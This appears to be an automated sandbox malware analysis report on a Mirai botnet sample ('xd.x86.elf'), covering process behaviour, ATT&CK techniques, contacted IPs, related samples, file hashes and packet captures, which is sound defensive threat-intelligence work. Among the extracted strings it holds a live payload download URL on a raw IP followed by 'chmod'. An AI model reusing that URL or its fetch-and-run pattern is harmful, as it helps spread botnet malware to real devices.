Source: /bin/sh (PID: 6371)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.nouveau[[:space:]]$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf	Jump to behavior
Source: /bin/sh (PID: 6373)	Grep executable: /usr/bin/grep -> grep -G ^blacklist.nouveau[[:space:]]$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf	Jump to behavior

Source: /usr/share/gdm/generate-config (PID: 6376)

Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service

Jump to behavior

Source: /usr/sbin/gdm3 (PID: 6378)	File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)			Jump to behavior
Source: /usr/sbin/gdm3 (PID: 6378)	File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)			Jump to behavior

Source: /usr/bin/gpu-manager (PID: 6357)	Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 6407)	Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 6418)	Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 6428)	Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 6438)	Log file created: /var/log/gpu-manager.log
Source: /usr/bin/gpu-manager (PID: 6448)	Log file created: /var/log/gpu-manager.log	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Sample deletes itself

Source: /tmp/xd.x86.elf (PID: 6240)	File: /usr/lib/systemd/systemd	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File: /usr/lib/systemd/systemd (deleted)	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File: /usr/bin/pulseaudio	Jump to behavior
Source: /tmp/xd.x86.elf (PID: 6240)	File: /usr/sbin/gdm3	Jump to behavior

Source: xd.x86.elf

Submission file: segment LOAD with 7.9601 entropy (max. 8.0)

Source: /usr/bin/gpu-manager (PID: 6357)	Truncated file: /var/log/gpu-manager.log	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6407)	Truncated file: /var/log/gpu-manager.log	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6418)	Truncated file: /var/log/gpu-manager.log	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6428)	Truncated file: /var/log/gpu-manager.log	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6438)	Truncated file: /var/log/gpu-manager.log	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6448)	Truncated file: /var/log/gpu-manager.log	Jump to behavior

Source: /usr/bin/pulseaudio (PID: 6349)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior
Source: /usr/bin/pkill (PID: 6376)	Reads CPU info from /sys: /sys/devices/system/cpu/online			Jump to behavior

Source: /usr/bin/pulseaudio (PID: 6349)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6357)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6407)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6418)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6428)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6438)	Queries kernel information via 'uname':	Jump to behavior
Source: /usr/bin/gpu-manager (PID: 6448)	Queries kernel information via 'uname':	Jump to behavior

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6239, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6241, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6242, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6243, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6246, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6249, type: MEMORYSTR

Remote Access Functionality

Yara detected Mirai

Source: Yara match	File source: 6247.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6249.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6239.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6243.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6242.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6241.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6246.1.0000000008048000.000000000805b000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6239, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6241, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6242, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6243, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6246, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6247, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: xd.x86.elf PID: 6249, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	Path Interception	1 File and Directory Permissions Modification	1 OS Credential Dumping	1 Security Software Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 Service Stop
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	Data from Removable Media	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Obfuscated Files or Information	Security Account Manager	1 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Indicator Removal	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact

Malware Configuration

⊘No configs have been found

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Number of created Files
Is malicious
Internet

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
xd.x86.elf	45%	Virustotal		Browse
xd.x86.elf	44%	ReversingLabs	Linux.Backdoor.Mirai

Dropped Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://213.209.129.92/d/xd.arm7;chmod	0%	Avira URL Cloud	safe

Domains and IPs

Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
daisy.ubuntu.com	162.213.35.25	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://daisy.ubuntu.com/9aadafe2051348cd32033e1cad68f0a5fe46fba3240ac1e6e42158f31b8a1371790c09baf3996b4979fe8e533446c7dedf30f654c68b25357334c66911dc6a9e	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://213.209.129.92/d/xd.arm7;chmod	xd.x86.elf, 6239.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6241.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6242.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6243.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6246.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6247.1.0000000008048000.000000000805b000.r-x.sdmp, xd.x86.elf, 6249.1.0000000008048000.000000000805b000.r-x.sdmp	false	Avira URL Cloud: safe	unknown
http://upx.sf.net	xd.x86.elf	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
206.101.207.91	unknown	United States	7991	CENTURYLINK-LEGACY-SAVVIS-ASIA-TRANSITUS	false
169.237.160.237	unknown	United States	6192	UCDAVIS-COREUS	false
213.217.82.126	unknown	Germany	20676	PLUSNETDE	false
181.158.241.99	unknown	Colombia	26611	COMCELSACO	false
80.228.156.254	unknown	Germany	9145	EWETELCloppenburgerStrasse310DE	false
86.67.119.95	unknown	France	15557	LDCOMNETFR	false
113.7.118.19	unknown	China	4837	CHINA169-BACKBONECHINAUNICOMChina169BackboneCN	false
181.20.184.199	unknown	Argentina	22927	TelefonicadeArgentinaAR	false
86.59.69.139	unknown	Austria	8437	UTA-ASAT	false
169.175.68.33	unknown	United States	37611	AfrihostZA	false
181.45.150.248	unknown	Argentina	27747	TelecentroSAAR	false
206.187.0.14	unknown	United States	3602	AS3602-ROGERS-COMCA	false
83.160.194.110	unknown	Netherlands	3265	XS4ALL-NLAmsterdamNL	false
82.57.85.63	unknown	Italy	3269	ASN-IBSNAZIT	false
83.227.3.102	unknown	Sweden	2119	TELENOR-NEXTELTelenorNorgeASNO	false
80.11.161.194	unknown	France	3215	FranceTelecom-OrangeFR	false
200.214.152.243	unknown	Brazil	4230	CLAROSABR	false
178.140.112.236	unknown	Russian Federation	42610	NCNET-ASRU	false
86.97.78.117	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false
86.93.133.29	unknown	Netherlands	1136	KPNKPNNationalEU	false
200.53.178.42	unknown	Mexico	22011	SixsigmaNetworksMexicoSAdeCVMX	false
86.142.163.126	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
83.92.228.104	unknown	Denmark	3292	TDCTDCASDK	false
200.142.228.12	unknown	unknown	26607	IBMBrasilIndustriaMaquinaseServicosLTDABR	false
80.71.52.194	unknown	Malta	34410	VANILLA-TELECOMS-LTD-MALTA-ASMT	false
213.138.4.112	unknown	France	12684	SES-LUX-ASLU	false
200.86.64.20	unknown	Chile	22047	VTRBANDAANCHASACL	false
86.220.89.56	unknown	France	3215	FranceTelecom-OrangeFR	false
181.215.136.220	unknown	Chile	61317	ASDETUKhttpwwwheficedcomGB	false
181.236.2.28	unknown	Colombia	3816	COLOMBIATELECOMUNICACIONESSAESPCO	false
200.124.103.107	unknown	Argentina	22080	BroadbandtechSAAR	false
213.79.252.4	unknown	Sweden	12501	NORRNODITSSE	false
68.83.210.121	unknown	United States	7922	COMCAST-7922US	false
86.77.25.0	unknown	France	15557	LDCOMNETFR	false
82.71.126.99	unknown	United Kingdom	13037	ZEN-ASZenInternet-UKGB	false
41.30.204.182	unknown	South Africa	29975	VODACOM-ZA	false
206.243.46.192	unknown	United States	3356	LEVEL3US	false
82.15.18.196	unknown	United Kingdom	5089	NTLGB	false
83.27.225.42	unknown	Poland	5617	TPNETPL	false
86.37.4.168	unknown	Qatar	29384	QATAR-FOUNDATIONQA	false
86.97.156.4	unknown	United Arab Emirates	5384	EMIRATES-INTERNETEmiratesInternetAE	false
86.211.10.107	unknown	France	3215	FranceTelecom-OrangeFR	false
83.82.161.209	unknown	Netherlands	33915	TNF-ASNL	false
181.124.169.247	unknown	Paraguay	23201	TelecelSAPY	false
181.187.147.207	unknown	Venezuela	262210	VIETTELPERUSACPE	false
83.240.30.140	unknown	Czech Republic	31246	NETBOX-ASNETBOXAutonomoussystemCZ	false
80.176.234.5	unknown	United Kingdom	2529	DEMON-INTERNETNowmaintainedbyCableWirelessWorldwide	false
181.205.145.188	unknown	Colombia	27831	ColombiaMovilCO	false
80.73.75.83	unknown	Russian Federation	21487	SAKHATELECOM-ASRU	false
86.174.178.78	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
178.101.143.188	unknown	United Kingdom	12576	EELtdGB	false
83.38.141.170	unknown	Spain	3352	TELEFONICA_DE_ESPANAES	false
63.70.133.211	unknown	United States	701	UUNETUS	false
169.21.184.194	unknown	United States	37611	AfrihostZA	false
200.72.96.137	unknown	Chile	6471	ENTELCHILESACL	false
169.199.219.198	unknown	United States	23309	CCCOE-NETUS	false
169.87.170.157	unknown	United States	37611	AfrihostZA	false
169.199.123.38	unknown	United States	23309	CCCOE-NETUS	false
82.111.254.33	unknown	United Kingdom	4589	EASYNETEasynetGlobalServicesEU	false
200.186.34.200	unknown	Brazil	3549	LVLT-3549US	false
48.197.226.22	unknown	United States	2686	ATGS-MMD-ASUS	false
200.194.248.82	unknown	Brazil	11432	TeliumTelecomunicacoesLtdaBR	false
83.180.191.8	unknown	Sweden	1257	TELE2EU	false
82.203.65.131	unknown	United Kingdom	51551	CAPITA-ASGB	false
80.101.145.38	unknown	Netherlands	3265	XS4ALL-NLAmsterdamNL	false
181.99.93.35	unknown	Argentina	7303	TelecomArgentinaSAAR	false
169.124.100.178	unknown	United States	37611	AfrihostZA	false
178.240.238.30	unknown	Turkey	16135	TURKCELL-ASTurkcellASTR	false
119.27.204.69	unknown	China	17819	ASN-EQUINIX-APEquinixAsiaPacificSG	false
191.145.80.99	unknown	Colombia	26611	COMCELSACO	false
181.18.98.194	unknown	Venezuela	27889	TelecomunicacionesMOVILNETVE	false
169.25.129.27	unknown	United States	37611	AfrihostZA	false
181.6.53.227	unknown	Argentina	7303	TelecomArgentinaSAAR	false
213.3.147.108	unknown	Switzerland	3303	SWISSCOMSwisscomSwitzerlandLtdCH	false
82.134.18.248	unknown	Norway	8542	BKK-DIGITEK-AS8542NorwayNO	false
213.73.200.238	unknown	Netherlands	33915	TNF-ASNL	false
206.218.55.123	unknown	United States	31966	CSAA-INSURANCE-EXCHANGEUS	false
206.201.135.185	unknown	United States	7029	WINDSTREAMUS	false
165.39.88.166	unknown	United States	37053	RSAWEB-ASZA	false
213.171.167.97	unknown	Italy	12637	SEEWEBWebhostingcolocationandcloudservicesIT	false
206.178.238.56	unknown	Canada	808	GONET-ASN-1CA	false
83.89.163.11	unknown	Denmark	3292	TDCTDCASDK	false
181.127.64.229	unknown	Paraguay	23201	TelecelSAPY	false
178.163.136.2	unknown	Belarus	42772	A1-BY-ASBY	false
82.216.84.132	unknown	France	21502	ASN-NUMERICABLEFR	false
86.121.135.28	unknown	Romania	8708	RCS-RDS73-75DrStaicoviciRO	false
82.52.176.223	unknown	Italy	3269	ASN-IBSNAZIT	false
80.13.5.183	unknown	France	3215	FranceTelecom-OrangeFR	false
206.247.190.121	unknown	United States	27258	KAMOPOWERUS	false
169.46.68.90	unknown	United States	36351	SOFTLAYERUS	false
181.210.214.131	unknown	Honduras	7727	HondutelHN	false
93.89.77.200	unknown	Turkey	196733	ESOESNETTR	false
12.44.125.253	unknown	United States	7018	ATT-INTERNET4US	false
206.121.192.0	unknown	United States	7018	ATT-INTERNET4US	false
178.211.47.67	unknown	Turkey	197328	INETLTDTR	false
169.225.255.4	unknown	United States	37611	AfrihostZA	false
86.155.5.132	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false
213.93.146.195	unknown	Netherlands	6830	LIBERTYGLOBALLibertyGlobalformerlyUPCBroadbandHolding	false
200.126.146.136	unknown	Argentina	10318	TelecomArgentinaSAAR	false
86.176.6.43	unknown	United Kingdom	2856	BT-UK-ASBTnetUKRegionalnetworkGB	false

Joe Sandbox View / Context

IPs

⊘No context

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
daisy.ubuntu.com	xd.x86_64.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	boatnet.x86.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	boatnet.arm.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	boatnet.arm6.elf	Get hash	malicious	Mirai	Browse	162.213.35.25
	bejv86.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	arm7.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	aarch64.elf	Get hash	malicious	Mirai	Browse	162.213.35.24
	arm6.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	arm5.elf	Get hash	malicious	Unknown	Browse	162.213.35.24
	efea6.elf	Get hash	malicious	Unknown	Browse	162.213.35.25

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
PLUSNETDE	xd.sh4.elf	Get hash	malicious	Mirai	Browse	84.245.129.125
	k03ldc.x86_64.elf	Get hash	malicious	Unknown	Browse	92.197.8.86
	hgfs.mips.elf	Get hash	malicious	Unknown	Browse	212.202.178.243
	splsh4.elf	Get hash	malicious	Unknown	Browse	62.206.192.250
	x.elf	Get hash	malicious	Unknown	Browse	92.201.203.214
	jaws.elf	Get hash	malicious	Unknown	Browse	92.199.212.80
	apep.sh4.elf	Get hash	malicious	Unknown	Browse	92.193.186.41
	apep.x86.elf	Get hash	malicious	Unknown	Browse	92.201.251.126
	a.elf	Get hash	malicious	Unknown	Browse	92.201.203.218
	jaws.elf	Get hash	malicious	Unknown	Browse	87.234.232.103
UCDAVIS-COREUS	mips.elf	Get hash	malicious	Gafgyt, Okiru	Browse	168.150.126.98
	Nyx4r.sh4.elf	Get hash	malicious	Okiru	Browse	168.150.41.3
	apep.mips.elf	Get hash	malicious	Unknown	Browse	169.237.143.234
	sora.arm.elf	Get hash	malicious	Mirai	Browse	169.237.191.130
	res.arm.elf	Get hash	malicious	Unknown	Browse	168.150.96.210
	XB6SkLK7Al.dll	Get hash	malicious	Wannacry	Browse	169.237.19.1
	i686.elf	Get hash	malicious	Mirai	Browse	152.79.195.238
	x86.elf	Get hash	malicious	Mirai	Browse	168.150.169.168
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	169.237.185.94
	arm5.elf	Get hash	malicious	Unknown	Browse	168.150.41.2
CENTURYLINK-LEGACY-SAVVIS-ASIA-TRANSITUS	mips.elf	Get hash	malicious	Unknown	Browse	206.142.39.25
	nklsh4.elf	Get hash	malicious	Unknown	Browse	207.82.133.64
	x86.elf	Get hash	malicious	Mirai	Browse	206.100.157.235
	i686.elf	Get hash	malicious	Unknown	Browse	206.143.110.168
	cbr.arm.elf	Get hash	malicious	Mirai	Browse	205.138.191.179
	Owari.spc.elf	Get hash	malicious	Unknown	Browse	206.142.15.77
	res.arm5.elf	Get hash	malicious	Unknown	Browse	206.100.86.253
	sh4.elf	Get hash	malicious	Unknown	Browse	206.101.147.172
	Hgf.m68k.elf	Get hash	malicious	Mirai	Browse	206.100.157.239
	nklarm5.elf	Get hash	malicious	Unknown	Browse	206.100.86.236
COMCELSACO	x86_64.elf	Get hash	malicious	Unknown	Browse	191.65.185.125
	bimbo-arm.elf	Get hash	malicious	Unknown	Browse	181.159.235.255
	k03ldc.arm.elf	Get hash	malicious	Unknown	Browse	181.243.146.83
	sh4.elf	Get hash	malicious	Unknown	Browse	181.151.53.173
	vjwe68k.elf	Get hash	malicious	Gafgyt, Mirai	Browse	181.245.68.59
	mips.elf	Get hash	malicious	Unknown	Browse	181.251.166.69
	ppc.elf	Get hash	malicious	Unknown	Browse	181.148.139.252
	resgod.sh4.elf	Get hash	malicious	Mirai	Browse	181.244.20.1
	weje64.elf	Get hash	malicious	Gafgyt, Mirai	Browse	191.73.76.178
	resgod.arm.elf	Get hash	malicious	Mirai	Browse	181.154.238.232

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-sink

Download File

Process:	/usr/bin/pulseaudio
File Type:	ASCII text
Category:	dropped
Size (bytes):	10
Entropy (8bit):	2.9219280948873623
Encrypted:	false
SSDEEP:	3:5bkPn:pkP
MD5:	FF001A15CE15CF062A3704CEA2991B5F
SHA1:	B06F6855F376C3245B82212AC73ADED55DFE5DEF
SHA-256:	C54830B41ECFA1B6FBDC30397188DDA86B7B200E62AEAC21AE694A6192DCC38A
SHA-512:	65EBF7C31F6F65713CE01B38A112E97D0AE64A6BD1DA40CE4C1B998F10CD3912EE1A48BB2B279B24493062118AAB3B8753742E2AF28E56A31A7AAB27DE80E7BF
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	auto_null.

/home/saturnino/.config/pulse/ee49dfd4fa47433baee88884e2d7de7c-default-source

Download File

Process:	/usr/bin/pulseaudio
File Type:	ASCII text
Category:	dropped
Size (bytes):	18
Entropy (8bit):	3.4613201402110088
Encrypted:	false
SSDEEP:	3:5bkrIZsXvn:pkckv
MD5:	28FE6435F34B3367707BB1C5D5F6B430
SHA1:	EB8FE2D16BD6BBCCE106C94E4D284543B2573CF6
SHA-256:	721A37C69E555799B41D308849E8F8125441883AB021B723FED90A9B744F36C0
SHA-512:	6B6AB7C0979629D0FEF6BE47C5C6BCC367EDD0AAE3FC973F4DE2FD5F0A819C89E7656DB65D453B1B5398E54012B27EDFE02894AD87A7E0AF3A9C5F2EB24A9919
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	auto_null.monitor.

/run/gdm3.pid

Download File

Process:	/usr/sbin/gdm3
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:Zt:T
MD5:	CCEA5795BEFB8E6738312413CAE59466
SHA1:	C3B3BBD016FFDFAD383FB15F7911C11DBBB053DC
SHA-256:	E021DA1479D92153AE2428B08F692669186E2A6A13C4ACB086668B16E9406388
SHA-512:	173061CB8EA14C2FBE8A4AF753404C555DB5E1C7E037CAD6FC04C4793481821D691FFAD6F34E652453E6CA60DA5A160A2E78589803B8CB5C959580F3E2A8DC0F
Malicious:	false
Reputation:	low
Preview:	6378.

/run/user/1000/pulse/pid

Download File

Process:	/usr/bin/pulseaudio
File Type:	ASCII text
Category:	dropped
Size (bytes):	5
Entropy (8bit):	2.321928094887362
Encrypted:	false
SSDEEP:	3:ae:ae
MD5:	BDC10D2760A8BD03E0199D850FA421CC
SHA1:	EAC57C30C012949C0BE25A2B0864033942EB2A92
SHA-256:	A9FA2C933D51F0A8DDE67645C7CB5851BBADCEA57BE52C6A543FA5F12AF9058B
SHA-512:	E4C2A6CF4AAA0B2FF68732AE80BD75C37178D6D3932E2D23CE0F645699D30D85F5CEF9D3CCFDE50E311EFE65E8DFF357064CEB742122B6EB111476A1477C78C7
Malicious:	false
Reputation:	low
Preview:	6349.

/var/lib/ubuntu-drivers-common/last_gfx_boot

Download File

Process:	/usr/bin/gpu-manager
File Type:	ASCII text
Category:	dropped
Size (bytes):	25
Entropy (8bit):	2.7550849518197795
Encrypted:	false
SSDEEP:	3:JoT/V9fDVbn:M/V3n
MD5:	078760523943E160756979906B85FB5E
SHA1:	0962643266F4C5537F7D125046F28F21D6DD0C89
SHA-256:	048416AC7A9A99690B8B53718CD39F32F637B55CC8DD8E67E58E5AEF060DD41C
SHA-512:	DEFAAE8F8B54C61A716A0B0B4884358FEB8EB44DFEA01AAA5A687FDA7182792B7DEBB34AA840672EB3B40EB59FD0186749E08E47D181786C7FAA8C8F73F0104D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	15ad:0405;0000:00:0f:0;1.

/var/log/gpu-manager.log

Download File

Process:	/usr/bin/gpu-manager
File Type:	ASCII text
Category:	dropped
Size (bytes):	1371
Entropy (8bit):	4.8296848499188485
Encrypted:	false
SSDEEP:	24:wPXXX9uV6BNu3WDF3GF3XFFxFFed2uk2HUvJlfWkpPpx7uvvAdow9555cJz:wPXXXe6vejpeC2HUR5WkpPpcvAdow95O
MD5:	3AF77E630DA00B3BE24F4E8AA5D78B13
SHA1:	BCF2D99E002F6DE2413A183227B011CFBEF5673D
SHA-256:	EB1CBBA20845237B4409274D693FEAE13F835274DA3337B7A9D14F4D7FDF9DEA
SHA-512:	8524B1E8A761F962B32F396812099B9B0B2DCF3C9FCA8605424753CFCFF4DC67EDC5EE1D8C91B9C0ED7FAE6BB1E752898B8D514B7C421D1839D6FEDA609C593C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	log_file: /var/log/gpu-manager.log.last_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.new_boot_file: /var/lib/ubuntu-drivers-common/last_gfx_boot.can't access /run/u-d-c-nvidia-was-loaded file.can't get module info via kmodcan't access /opt/amdgpu-pro/bin/amdgpu-pro-px.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/kernel.Looking for nvidia modules in /lib/modules/5.4.0-72-generic/updates/dkms.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/kernel.Looking for amdgpu modules in /lib/modules/5.4.0-72-generic/updates/dkms.Is nvidia loaded? no.Was nvidia unloaded? no.Is nvidia blacklisted? no.Is intel loaded? no.Is radeon loaded? no.Is radeon blacklisted? no.Is amdgpu loaded? no.Is amdgpu blacklisted? no.Is amdgpu versioned? no.Is amdgpu pro stack? no.Is nouveau loaded? no.Is nouveau blacklisted? no.Is nvidia kernel module available? no.Is amdgpu kernel module available? no.Vendor/Device Id: 15ad:405.BusID "PCI:0@0:15:0".Is boot vga? yes.Error: can't acce

File type:	ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, no section header
Entropy (8bit):	7.95785422368574
TrID:	ELF Executable and Linkable format (Linux) (4029/14) 50.16% ELF Executable and Linkable format (generic) (4004/1) 49.84%
File name:	xd.x86.elf
File size:	37'268 bytes
MD5:	a68aa2179d0db1bb9cf010a4949ea024
SHA1:	702e982ff2347f14703fb12bfdc53e1946566510
SHA256:	83ebd86adf2f88f83af9762d2bb64ac37c4a78c393351549892e2ebe914dbe52
SHA512:	64475ba3ebdc96bbd7fdd95698d2e342cd0e40dbff6cabf40e8e9d07598ccb7bfccd2747da676aaed8ddcbece6b7a3faca80214e924515ced20e7a63c05320ae
SSDEEP:	768:h0UXs5VHqxlKy0pKO99E+ESgRqDFJQdX2xDAwekNknbcuyD7URQRjC:hPqC0pK0ERSgRqDFJH53Nknouy8Rym
TLSH:	36F2E092C2FD0A6EF4AB033741BF76452A34B0192261E893CBC5E23B4D59F1C395E6D6
File Content Preview:	.ELF........................4...........4. ...(......................................... ... ... ...................Q.td.............................-].UPX!........P4..P4......U..........?..k.I/.j....\.d*nlz.e..H.....4.0.N..9..y.....W.x.G..n.y.'.yY..C.(.S

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	Intel 80386
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - Linux
ABI Version:	0
Entry Point Address:	0xc08ea8
Flags:	0x0
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	3
Section Header Offset:	0
Section Header Size:	40
Number of Section Headers:	0
Header String Table Index:	0

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align
LOAD	0x0	0xc01000	0xc01000	0x909c	0x909c	7.9601	0x5	R E	0x1000
LOAD	0xb20	0x805db20	0x805db20	0x0	0x0	0.0000	0x6	RW	0x1000
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x6	RW	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 2, 2025 20:53:53.863008976 CEST	34398	53	192.168.2.23	1.1.1.1
Apr 2, 2025 20:53:53.863130093 CEST	46016	53	192.168.2.23	1.1.1.1
Apr 2, 2025 20:53:53.966358900 CEST	53	46016	1.1.1.1	192.168.2.23
Apr 2, 2025 20:53:53.967715979 CEST	53	34398	1.1.1.1	192.168.2.23
Apr 2, 2025 20:53:54.014563084 CEST	38995	53	192.168.2.23	1.1.1.1
Apr 2, 2025 20:53:54.123881102 CEST	53	38995	1.1.1.1	192.168.2.23

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 2, 2025 20:53:55.161330938 CEST	192.168.2.23	192.168.2.1	8283	(Port unreachable)	Destination Unreachable
